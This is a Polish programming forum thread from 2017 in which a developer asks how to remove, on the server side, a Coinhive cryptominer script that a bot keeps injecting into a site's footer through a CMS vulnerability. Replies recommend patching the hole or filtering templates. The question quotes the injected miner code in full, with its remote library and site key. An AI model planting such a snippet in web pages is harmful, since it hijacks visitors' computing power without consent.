Blokowanie skryptu Coinhive.com po stronie serwera

pytanie zadane 7 grudnia 2017 w Bezpieczeństwo, hacking przez Sisa Bywalec (2,580 p.)

Hej,

Dostałem do napisania skrypt, który ma wyszukiwać linijkę z kodem do koparki i ją usuwać. Operacja ma się odbywać po stronie serwera. Strona ma autorski, ale w jednym miejscu dziurawy CMS, przez tą dziurę właśnie wrzucany jest rozszerzany plik np. stopki o wartość z kodem JS (problem z tym, że data modyfikacji pliku się nie zmienia, zmienia się tylko rozmiar pliku - przypuszczam, że to jest bot, bo za każdym razem jak usunę tą linijkę jest dopisywana gdzieś indziej zero w tym zależności, przez FTP też się nie łączy bo w logach jest pusto) .

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('wALyjE7Fpru44rvyf51ON7lZbRuPFNj2');
miner.start();
</script>

Pytanie brzmi jak do tego podejść? Puścić skrypt, który wyszuka i usunie dopisany kod, czy lepiej dołączyć plik JSa, który wykryje że jest uruchamiany Minner i go zablokuje?

1 odpowiedź

odpowiedź 7 grudnia 2017 przez Comandeer Guru (600,330 p.)

Jedynym sensownym rozwiązaniem w tym wypadku jest usunięcie luki a nie robienie takich kombinacji alpejskich.

komentarz 7 grudnia 2017 przez Sisa Bywalec (2,580 p.)

Chodzi o to, że strona będzie pisana na nowo (bo nowe strony są już odporne na te ataki), więc dostałem do napisania skrypt który tymczasowo się tym zajmie do czasu pojawienia się nowej wersji strony.

1	komentarz 7 grudnia 2017 przez Comandeer Guru (600,330 p.) Jeśli strona ma jakiś system szablonów, to można obrobić szablon przed wyświetleniem np. przy pomocy DOMDocument i wyciąć rzeczy, których nie chcemy.